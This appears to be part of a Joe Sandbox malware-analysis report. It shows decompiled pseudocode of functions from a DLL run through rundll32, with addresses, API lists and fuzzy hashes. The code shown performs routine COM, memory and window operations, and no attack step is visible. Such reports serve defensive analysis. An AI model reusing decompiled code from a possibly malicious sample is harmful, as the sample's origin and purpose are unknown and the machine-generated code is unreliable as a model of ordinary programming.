							 *((intOrPtr*)(_t263 - 0x18)) = 0;
							 *((intOrPtr*)(_t263 - 0x14)) = 0x1e;
							_t196 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, 2, _t263 - 0x70, 0x28, 0);
							if(_t196 >= 0) {
								 *(_t263 - 0xa0) =  *(_t263 - 0x7c);
								_t143 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)(_t263 - 0x9c)) = 1;
								 *(_t263 - 0x98) = 0;
								 *((intOrPtr*)(_t263 - 0x94)) = 0;
								 *((intOrPtr*)(_t263 - 0x90)) = 0;
								_t144 =  *((intOrPtr*)( *_t143 + 0x18))(_t143, 0, 0, _t263 - 0xa0);
								 *((intOrPtr*)(_t263 - 0x84)) = _t144;
								if(_t144 >= 0) {
									 *(_t261 + 0x14) =  *(_t263 - 0x98);
									_t146 =  *(_t263 - 0x8c);
									 *(_t263 - 0x7c) = _t146;
									 *(_t261 + 0x10) = _t146;
									_t147 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)(_t261 + 0x34)) =  *((intOrPtr*)(_t263 - 0x94));
									 *((intOrPtr*)( *_t147 + 8))(_t147);
									goto L23;
								} else {
									_t161 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)( *_t161 + 8))(_t161);
								}
								goto L41;
							} else {
								_t163 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t163 + 8))(_t163);
								_t134 = _t196;
							}
						}
					} else {
						_t134 = 0;
					}
				} else {
					_t165 =  *((intOrPtr*)(__ecx + 0x4c));
					_t134 =  *((intOrPtr*)( *_t165 + 0x14))(_t165, 0x10043228, _t263 - 0x74);
					 *((intOrPtr*)(_t263 - 0x84)) = _t134;
					if(_t134 >= 0) {
						_t166 =  *((intOrPtr*)(_t263 - 0x74));
						_push(_t263 - 0x7c);
						_push(0x10043208);
						_push(_t166);
						if( *((intOrPtr*)( *_t166))() >= 0) {
							_t186 =  *(_t263 - 0x7c);
							_push(_t263 - 0x78);
							_push(0x10043348);
							 *((intOrPtr*)(_t263 - 0x78)) = 0;
							_push(_t186);
							if( *((intOrPtr*)( *_t186 + 0x10))() >= 0) {
								_t190 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t190 + 0x14))(_t190,  *((intOrPtr*)(__ecx + 4)) + 0xe4, __ecx + 0x58);
								_t192 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t192 + 8))(_t192);
							}
							_t188 =  *(_t263 - 0x7c);
							 *((intOrPtr*)( *_t188 + 8))(_t188);
						}
						if(E1001F77E(0x14) == 0) {
							_t169 = 0;
						} else {
							_t169 = E1000D069(_t168,  *((intOrPtr*)(_t263 - 0x74)));
						}
						 *((intOrPtr*)(_t261 + 0x50)) = _t169;
						_t170 =  *((intOrPtr*)(_t263 - 0x74));
						 *((intOrPtr*)( *_t170 + 8))(_t170);
						_t172 =  *((intOrPtr*)(_t261 + 0x50));
						_t229 =  *_t172;
						if( *_t172 != 0) {
							E1000B427(_t229, _t172 + 4);
						}
						if(E1001F77E(0x28) == 0) {
							_t174 = 0;
						} else {
							_t174 = E10009E9C(_t173, 0, 0x1f40);
						}
						 *((intOrPtr*)(_t261 + 0x54)) = _t174;
						E1000DB7F(_t174);
						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)) + 8)) =  *((intOrPtr*)(_t261 + 0x54));
						_t178 =  *( *((intOrPtr*)(_t261 + 0x54)) + 0xc);
						 *(_t261 + 0x10) = _t178;
						_t180 = _t178 + _t178 * 4 << 3;
						__imp__CoTaskMemAlloc(_t180,  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)))));
						 *(_t261 + 0x14) = _t180;
						E10011C50(_t180, 0,  *(_t261 + 0x10) +  *(_t261 + 0x10) * 4 << 3);
						E1000DA69( *((intOrPtr*)(_t261 + 0x50)));
						E1000B3E4( *((intOrPtr*)(_t261 + 0x50)));
						L23:
						 *((intOrPtr*)(_t263 - 0x74)) = 0;
						if( *(_t261 + 0x10) > 0) {
							_t200 = 0;
							do {
								_t158 = E1001F77E(0x1c);
								 *(_t263 - 0x7c) = _t158;
								 *(_t263 - 4) = 0;
								if(_t158 == 0) {
									_t159 = 0;
								} else {
									_t159 = E1001E0EA(_t158, 0xa);
								}
								 *(_t263 - 4) =  *(_t263 - 4) | 0xffffffff;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x74)) + 1;
								 *((intOrPtr*)(_t200 +  *(_t261 + 0x14) + 0x24)) = _t159;
								_t200 = _t200 + 0x28;
							} while ( *((intOrPtr*)(_t263 - 0x74)) <  *(_t261 + 0x10));
						}
						_t198 =  *((intOrPtr*)(_t263 - 0x88));
						if(_t198 != 0) {
							if( *((intOrPtr*)(_t263 - 0x80)) > 0) {
								_t149 = 0xffffffdc;
								_t199 = _t198 + 0x24;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x80));
								 *(_t263 - 0x7c) = _t149 -  *((intOrPtr*)(_t263 - 0x88));
								while(1) {
									_t213 =  *((intOrPtr*)( *_t199 + 4));
									 *((intOrPtr*)(_t263 - 0x80)) = _t213;
									if(_t213 == 0) {
										goto L37;
									}
									while(1) {
										_t153 = E10006D96(_t263 - 0x80);
										 *((intOrPtr*)( *_t261 + 8))( *_t153, 1);
										if( *((intOrPtr*)(_t263 - 0x80)) == 0) {
											goto L37;
										}
									}
									L37:
									E1001E047( *_t199);
									_t215 =  *_t199;
									if(_t215 != 0) {
										 *((intOrPtr*)( *_t215 + 4))(1);
									}
									_t199 = _t199 + 0x28;
									_t122 = _t263 - 0x74;
									 *_t122 =  *((intOrPtr*)(_t263 - 0x74)) - 1;
									if( *_t122 != 0) {
										continue;
									}
									goto L40;
								}
							}
							L40:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t263 - 0x88)));
						}
						L41:
						_t134 =  *((intOrPtr*)(_t263 - 0x84));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0xc));
				return E100117AE(_t134,  *((intOrPtr*)(_t263 - 0x10)));
			}




































                                                                        0x1000e154
                                                                        0x1000e15f
                                                                        0x1000e166
                                                                        0x1000e168
                                                                        0x1000e16f
                                                                        0x1000e17d
                                                                        0x1000e180
                                                                        0x1000e2ad
                                                                        0x1000e2b2
                                                                        0x1000e2c0
                                                                        0x1000e2c4
                                                                        0x1000e2c5
                                                                        0x1000e2ca
                                                                        0x1000e2d0
                                                                        0x1000e2e1
                                                                        0x1000e2e6
                                                                        0x1000e2f5
                                                                        0x1000e2f8
                                                                        0x1000e2fb
                                                                        0x1000e302
                                                                        0x1000e305
                                                                        0x1000e30c
                                                                        0x1000e311
                                                                        0x1000e314
                                                                        0x1000e321
                                                                        0x1000e328
                                                                        0x1000e32b
                                                                        0x1000e332
                                                                        0x1000e335
                                                                        0x1000e342
                                                                        0x1000e346
                                                                        0x1000e365
                                                                        0x1000e36b
                                                                        0x1000e371
                                                                        0x1000e37b
                                                                        0x1000e381
                                                                        0x1000e387
                                                                        0x1000e390
                                                                        0x1000e395
                                                                        0x1000e39b
                                                                        0x1000e3b7
                                                                        0x1000e3ba
                                                                        0x1000e3c0
                                                                        0x1000e3c3
                                                                        0x1000e3c6
                                                                        0x1000e3c9
                                                                        0x1000e3cf
                                                                        0x00000000
                                                                        0x1000e39d
                                                                        0x1000e39d
                                                                        0x1000e3a3
                                                                        0x1000e3a3
                                                                        0x00000000
                                                                        0x1000e348
                                                                        0x1000e348
                                                                        0x1000e34e
                                                                        0x1000e351
                                                                        0x1000e351
                                                                        0x1000e346
                                                                        0x1000e2b4
                                                                        0x1000e2b4
                                                                        0x1000e2b4
                                                                        0x1000e186
                                                                        0x1000e186
                                                                        0x1000e195
                                                                        0x1000e19a
                                                                        0x1000e1a0
                                                                        0x1000e1a6
                                                                        0x1000e1ae
                                                                        0x1000e1af
                                                                        0x1000e1b4
                                                                        0x1000e1b9
                                                                        0x1000e1bb
                                                                        0x1000e1c1
                                                                        0x1000e1c2
                                                                        0x1000e1c7
                                                                        0x1000e1cc
                                                                        0x1000e1d2
                                                                        0x1000e1d4
                                                                        0x1000e1e8
                                                                        0x1000e1eb
                                                                        0x1000e1f1
                                                                        0x1000e1f1
                                                                        0x1000e1f4
                                                                        0x1000e1fa
                                                                        0x1000e1fa
                                                                        0x1000e207
                                                                        0x1000e215
                                                                        0x1000e209
                                                                        0x1000e20e
                                                                        0x1000e20e
                                                                        0x1000e217
                                                                        0x1000e21a
                                                                        0x1000e220
                                                                        0x1000e223
                                                                        0x1000e226
                                                                        0x1000e22a
                                                                        0x1000e231
                                                                        0x1000e231
                                                                        0x1000e240
                                                                        0x1000e251
                                                                        0x1000e242
                                                                        0x1000e24a
                                                                        0x1000e24a
                                                                        0x1000e256
                                                                        0x1000e25d
                                                                        0x1000e268
                                                                        0x1000e26e
                                                                        0x1000e271
                                                                        0x1000e277
                                                                        0x1000e27b
                                                                        0x1000e28d
                                                                        0x1000e290
                                                                        0x1000e29b
                                                                        0x1000e2a3
                                                                        0x1000e3d2
                                                                        0x1000e3d5
                                                                        0x1000e3d8
                                                                        0x1000e3da
                                                                        0x1000e3dc
                                                                        0x1000e3de
                                                                        0x1000e3e4
                                                                        0x1000e3e9
                                                                        0x1000e3ec
                                                                        0x1000e3f9
                                                                        0x1000e3ee
                                                                        0x1000e3f2
                                                                        0x1000e3f2
                                                                        0x1000e3fb
                                                                        0x1000e402
                                                                        0x1000e405
                                                                        0x1000e40c
                                                                        0x1000e40f
                                                                        0x1000e3dc
                                                                        0x1000e414
                                                                        0x1000e41c
                                                                        0x1000e421
                                                                        0x1000e428
                                                                        0x1000e429
                                                                        0x1000e432
                                                                        0x1000e435
                                                                        0x1000e43d
                                                                        0x1000e43f
                                                                        0x1000e444
                                                                        0x1000e447
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000e44e
                                                                        0x1000e45b
                                                                        0x1000e469
                                                                        0x1000e46f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000e44b
                                                                        0x1000e471
                                                                        0x1000e473
                                                                        0x1000e478
                                                                        0x1000e47c
                                                                        0x1000e482
                                                                        0x1000e482
                                                                        0x1000e485
                                                                        0x1000e488
                                                                        0x1000e488
                                                                        0x1000e48b
                                                                        0x00000000
                                                                        0x1000e43a
                                                                        0x00000000
                                                                        0x1000e48b
                                                                        0x1000e43d
                                                                        0x1000e48d
                                                                        0x1000e493
                                                                        0x1000e493
                                                                        0x1000e499
                                                                        0x1000e499
                                                                        0x1000e499
                                                                        0x1000e1a0
                                                                        0x1000e4a4
                                                                        0x1000e4b5

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1000E154
                                                                        • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 1000E27B
                                                                        • CoTaskMemFree.OLE32(?,?,00000000), ref: 1000E493
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Task$AllocFreeH_prolog
                                                                        • String ID:
                                                                        • API String ID: 1522537378-3916222277
                                                                        • Opcode ID: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                        • Instruction ID: e4bcf968e0ea1d6695bf60cb4aa7b1ca6ea302c548195cc232f4004078e55fdd
                                                                        • Opcode Fuzzy Hash: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                        • Instruction Fuzzy Hash: AAC11874A006489FDB24CFA8C884AAEBBF5FF88344F20465DE155EB256DB71AD45CF10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000B6F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 54%
                                                                        			E1000B6F5(void* __ecx) {
				intOrPtr* _t76;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t143;
				void* _t146;
				void* _t148;

				E10011BF0(0x1003ae9f, _t148);
				_t146 = __ecx;
				_t76 =  *((intOrPtr*)(__ecx + 0x4c));
				_push(_t148 - 0x14);
				_push(0x10043128);
				 *((intOrPtr*)(_t148 - 0x14)) = 0;
				_push(_t76);
				 *((intOrPtr*)(_t148 - 0x18)) = 0;
				if( *((intOrPtr*)( *_t76))() >= 0) {
					 *((intOrPtr*)(_t148 - 0x7c)) = __ecx + 0xc4;
					 *((intOrPtr*)(_t148 - 0x74)) = __ecx + 0xd4;
					 *((intOrPtr*)(_t148 - 0x70)) = __ecx + 0xd8;
					 *((intOrPtr*)(_t148 - 0x80)) = 0x40;
					 *((intOrPtr*)(_t148 - 0x78)) = 0;
					 *((intOrPtr*)(_t148 - 0x5c)) = 0;
					 *((intOrPtr*)(_t148 - 0x50)) = 0;
					 *((intOrPtr*)(_t148 - 0x4c)) = 0;
					E10010592(_t148 - 0x28);
					_t143 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) + 0x1c));
					 *((intOrPtr*)(_t148 - 4)) = 0;
					 *(_t148 - 0x6c) = 0;
					 *((intOrPtr*)(_t148 - 0x10)) = 0;
					do {
						 *((intOrPtr*)( *_t143 + 0x104))(_t146,  *((intOrPtr*)( *((intOrPtr*)(_t148 - 0x10)) + 0x10040560)), _t148 - 0x28);
						if( *((intOrPtr*)(_t148 - 0x20)) != 0) {
							 *(_t148 - 0x6c) =  *(_t148 - 0x6c) |  *( *((intOrPtr*)(_t148 - 0x10)) + 0x10040564);
						}
						 *((intOrPtr*)(_t148 - 0x10)) =  *((intOrPtr*)(_t148 - 0x10)) + 8;
					} while ( *((intOrPtr*)(_t148 - 0x10)) < 0x40);
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd40, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x68)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd43, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x64)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd34, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x58)) =  *((short*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd3f, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x54)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd41, _t148 - 0x28);
					_t101 =  *((intOrPtr*)(_t148 - 0x20));
					_push(_t148 - 0x60);
					_push(0x10043178);
					_push(_t101);
					if( *((intOrPtr*)( *_t101))() < 0) {
						 *((intOrPtr*)(_t148 - 0x60)) = 0;
					}
					_t103 =  *((intOrPtr*)(_t148 - 0x14));
					_push(_t148 - 0x40);
					_push(_t148 - 0x80);
					 *((intOrPtr*)(_t148 - 0x40)) = 0x18;
					_push(_t103);
					if( *((intOrPtr*)( *_t103 + 0xc))() >= 0) {
						 *((intOrPtr*)(_t146 + 0x6c)) =  *((intOrPtr*)(_t148 - 0x3c));
						 *((intOrPtr*)(_t146 + 0x5c)) =  *((intOrPtr*)(_t148 - 0x34));
						 *((intOrPtr*)(_t146 + 0x60)) =  *((intOrPtr*)(_t148 - 0x30));
						 *((intOrPtr*)(_t148 - 0x18)) = 1;
					}
					_t105 =  *((intOrPtr*)(_t148 - 0x14));
					 *((intOrPtr*)( *_t105 + 8))(_t105);
					_t107 =  *((intOrPtr*)(_t148 - 0x60));
					if(_t107 != 0) {
						 *((intOrPtr*)( *_t107 + 8))(_t107);
					}
					__imp__#9(_t148 - 0x28);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t148 - 0xc));
				return  *((intOrPtr*)(_t148 - 0x18));
			}











                                                                        0x1000b6fa
                                                                        0x1000b707
                                                                        0x1000b709
                                                                        0x1000b70c
                                                                        0x1000b70f
                                                                        0x1000b714
                                                                        0x1000b719
                                                                        0x1000b71a
                                                                        0x1000b721
                                                                        0x1000b72d
                                                                        0x1000b736
                                                                        0x1000b73f
                                                                        0x1000b747
                                                                        0x1000b74e
                                                                        0x1000b751
                                                                        0x1000b754
                                                                        0x1000b757
                                                                        0x1000b75a
                                                                        0x1000b762
                                                                        0x1000b765
                                                                        0x1000b768
                                                                        0x1000b76b
                                                                        0x1000b76e
                                                                        0x1000b780
                                                                        0x1000b78a
                                                                        0x1000b795
                                                                        0x1000b795
                                                                        0x1000b798
                                                                        0x1000b79c
                                                                        0x1000b7b0
                                                                        0x1000b7c2
                                                                        0x1000b7ca
                                                                        0x1000b7dc
                                                                        0x1000b7e4
                                                                        0x1000b7f7
                                                                        0x1000b7ff
                                                                        0x1000b811
                                                                        0x1000b819
                                                                        0x1000b81f
                                                                        0x1000b827
                                                                        0x1000b828
                                                                        0x1000b82d
                                                                        0x1000b833
                                                                        0x1000b835
                                                                        0x1000b835
                                                                        0x1000b838
                                                                        0x1000b83e
                                                                        0x1000b842
                                                                        0x1000b843
                                                                        0x1000b84c
                                                                        0x1000b852
                                                                        0x1000b857
                                                                        0x1000b85d
                                                                        0x1000b863
                                                                        0x1000b866
                                                                        0x1000b866
                                                                        0x1000b86d
                                                                        0x1000b873
                                                                        0x1000b876
                                                                        0x1000b87b
                                                                        0x1000b880
                                                                        0x1000b880
                                                                        0x1000b887
                                                                        0x1000b887
                                                                        0x1000b895
                                                                        0x1000b89d

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ClearH_prologVariant
                                                                        • String ID: @$@
                                                                        • API String ID: 1166855276-149943524
                                                                        • Opcode ID: e890f0e6bb8d7fafe3cff4ca8cca7ae2ad4144aa324fa51ad2fccd96fbd137c1
                                                                        • Instruction ID: d7a2f0cc547cc5a266f2ab8e80424e9948fc94c4121f0c35bce9c1610e35d146
                                                                        • Opcode Fuzzy Hash: e890f0e6bb8d7fafe3cff4ca8cca7ae2ad4144aa324fa51ad2fccd96fbd137c1
                                                                        • Instruction Fuzzy Hash: D551D4B1A002199FDB04CFA9C8889EEBBF9FF48314F14456EE506EB250E774A941CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001D0BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E1001D0BB(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t64;
				intOrPtr _t67;
				signed int _t69;
				void* _t85;
				char* _t86;
				void* _t99;
				char* _t100;
				signed char _t101;
				CHAR* _t115;
				intOrPtr _t120;
				void* _t122;
				void* _t124;
				void* _t125;

				E10011BF0(0x1003b2ec, _t122);
				_t125 = _t124 - 0x9c;
				_t64 =  *0x1004c470; // 0x1bfbe703
				_push(__esi);
				_push(__edi);
				_t120 = __ecx;
				 *((intOrPtr*)(_t122 - 0x10)) = _t64;
				 *((intOrPtr*)(_t122 - 0xa8)) = __ecx;
				E1001EC4F(__ecx, 0,  *((intOrPtr*)(_t122 + 0x1c)));
				 *((intOrPtr*)(_t122 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x10040f84;
				E100017B0(__ecx + 0x78);
				 *((char*)(_t122 - 4)) = 1;
				if( *((intOrPtr*)(_t122 + 0x20)) == 0) {
					E10011C50(_t122 - 0xa4, 0, 0x94);
					_t125 = _t125 + 0xc;
					 *(_t122 - 0xa4) = 0x94;
					GetVersionExA(_t122 - 0xa4);
					if( *((intOrPtr*)(_t122 - 0x94)) != 2) {
						L3:
						 *((intOrPtr*)(_t122 + 0x20)) = 0x4c;
					} else {
						 *((intOrPtr*)(_t122 + 0x20)) = 0x58;
						if( *((intOrPtr*)(_t122 - 0xa0)) < 5) {
							goto L3;
						}
					}
				}
				_t67 = E100107B6( *((intOrPtr*)(_t122 + 0x20)));
				_pop(_t99);
				 *((intOrPtr*)(_t120 + 0x70)) = _t67;
				if(_t67 == 0) {
					_t67 = E1001CE3B(_t99);
				}
				E10011C50(_t67, 0,  *((intOrPtr*)(_t122 + 0x20)));
				_t69 =  *(_t122 + 8);
				 *(_t120 + 0x74) = _t69;
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t120 + 0x50)) =  ~_t69 + 0x7005;
				 *((intOrPtr*)(_t120 + 0x1c0)) = 0;
				_t100 = _t120 + 0x7c;
				 *_t100 = 0;
				_t115 = _t120 + 0xbc;
				 *_t115 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x70)))) =  *((intOrPtr*)(_t122 + 0x20));
				 *( *((intOrPtr*)(_t120 + 0x70)) + 0x1c) = _t115;
				 *( *((intOrPtr*)(_t120 + 0x70)) + 0x20) = 0x104;
				 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x70)) + 0x3c)) =  *((intOrPtr*)(_t122 + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x70)) + 0x24)) = _t100;
				_t101 = 0x40;
				 *( *((intOrPtr*)(_t120 + 0x70)) + 0x28) = _t101;
				 *( *((intOrPtr*)(_t120 + 0x70)) + 0x34) =  *( *((intOrPtr*)(_t120 + 0x70)) + 0x34) |  *(_t122 + 0x14) | 0x00080020;
				if(( *(_t122 + 0x14) & _t101) != 0) {
					 *( *((intOrPtr*)(_t120 + 0x70)) + 0x36) =  *( *((intOrPtr*)(_t120 + 0x70)) + 0x36) & 0x0000007f;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x70)) + 8)) =  *((intOrPtr*)(E100373B5() + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x70)) + 0x44)) = E1001D28C;
				if( *(_t122 + 0x10) != 0) {
					lstrcpynA(_t115,  *(_t122 + 0x10), 0x104);
				}
				if( *((intOrPtr*)(_t122 + 0x18)) != 0) {
					_t117 = _t120 + 0x78;
					E10006AEC(_t120 + 0x78,  *((intOrPtr*)(_t122 + 0x18)));
					_t85 = E100017D0(_t120 + 0x78, 0);
					while(1) {
						_t86 = E100122D4(_t117, _t120, _t85, 0x7c);
						if(_t86 == 0) {
							break;
						}
						 *_t86 = 0;
						_t85 = _t86 + 1;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x70)) + 0xc)) =  *((intOrPtr*)(_t120 + 0x78));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0xc));
				return E100117AE(_t120,  *((intOrPtr*)(_t122 - 0x10)));
			}
















                                                                        0x1001d0c0
                                                                        0x1001d0c5
                                                                        0x1001d0cb
                                                                        0x1001d0d1
                                                                        0x1001d0d2
                                                                        0x1001d0d6
                                                                        0x1001d0db
                                                                        0x1001d0de
                                                                        0x1001d0e4
                                                                        0x1001d0ec
                                                                        0x1001d0ef
                                                                        0x1001d0f5
                                                                        0x1001d0fd
                                                                        0x1001d101
                                                                        0x1001d111
                                                                        0x1001d116
                                                                        0x1001d120
                                                                        0x1001d126
                                                                        0x1001d133
                                                                        0x1001d145
                                                                        0x1001d145
                                                                        0x1001d135
                                                                        0x1001d13c
                                                                        0x1001d143
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001d143
                                                                        0x1001d133
                                                                        0x1001d14f
                                                                        0x1001d156
                                                                        0x1001d157
                                                                        0x1001d15a
                                                                        0x1001d15c
                                                                        0x1001d15c
                                                                        0x1001d166
                                                                        0x1001d16b
                                                                        0x1001d171
                                                                        0x1001d179
                                                                        0x1001d180
                                                                        0x1001d186
                                                                        0x1001d18c
                                                                        0x1001d18f
                                                                        0x1001d191
                                                                        0x1001d197
                                                                        0x1001d199
                                                                        0x1001d1a1
                                                                        0x1001d1a7
                                                                        0x1001d1b1
                                                                        0x1001d1ba
                                                                        0x1001d1c2
                                                                        0x1001d1c3
                                                                        0x1001d1cf
                                                                        0x1001d1d5
                                                                        0x1001d1da
                                                                        0x1001d1da
                                                                        0x1001d1ec
                                                                        0x1001d1f2
                                                                        0x1001d1f9
                                                                        0x1001d204
                                                                        0x1001d204
                                                                        0x1001d20d
                                                                        0x1001d212
                                                                        0x1001d217
                                                                        0x1001d21f
                                                                        0x1001d229
                                                                        0x1001d22c
                                                                        0x1001d235
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001d226
                                                                        0x1001d228
                                                                        0x1001d228
                                                                        0x1001d23d
                                                                        0x1001d23d
                                                                        0x1001d247
                                                                        0x1001d258

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: H_prologVersionlstrcpyn
                                                                        • String ID: L
                                                                        • API String ID: 2508861242-2909332022
                                                                        • Opcode ID: 45fba12e316358985154b0c6b51ad8b47f09cec3adec5e1ce226de42e1b80597
                                                                        • Instruction ID: 246b81b315cba9c996970af4f41ffa1355ff2ed3fe1c007d423f7652d90d3d69
                                                                        • Opcode Fuzzy Hash: 45fba12e316358985154b0c6b51ad8b47f09cec3adec5e1ce226de42e1b80597
                                                                        • Instruction Fuzzy Hash: 39519CB4A00B49DFDB21DF68C884A9ABBF5FF48344F00465EF9999B261C774E881CB00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10033B73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E10033B73(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
				intOrPtr _v8;
				void* __ebp;
				int _t42;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t77;

				_t69 = __edx;
				_push(__ecx);
				_t71 = _a4;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t71 + 0x84)) == 0) {
					L6:
					if(( *(_t71 + 0x7c) & 0x00000004) != 0) {
						_a16 = _a16 | 0x00000004;
						if((_a17 & 0x00000050) != 0) {
							_a16 = _a16 & 0xffff2fff | 0x00002000;
						}
					}
					_t74 = E100339A3(_v8, _a16);
					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
					if( *(_t74 + 0x34) == 0) {
						 *(_t74 + 0x34) =  *(_t71 + 0x1c);
					}
					E1002D821(E10020230(_t74, 0xe81f), _t69, _t71, 0);
					 *((intOrPtr*)( *_t74 + 0x144))(1);
					_t42 = GetWindowLongA( *(_t71 + 0x1c), 0xfffffff0);
					if((_t42 & 0x10000000) == 0) {
						L14:
						return _t42;
					} else {
						E100203AD(_t74, 8);
						L13:
						_t42 = UpdateWindow( *(_t74 + 0x1c));
						goto L14;
					}
				}
				_t76 =  *((intOrPtr*)(_t71 + 0x88));
				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x90)) == 0 || E1002D0E3(_t76) != 1 || ( *(_t76 + 0x7c) & _a16 & 0x000000f0) == 0) {
					goto L6;
				} else {
					_t74 = E100220EE(_t77, GetParent( *(_t76 + 0x1c)));
					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
					 *((intOrPtr*)( *_t74 + 0x144))(1);
					goto L13;
				}
			}











                                                                        0x10033b73
                                                                        0x10033b76
                                                                        0x10033b7a
                                                                        0x10033b85
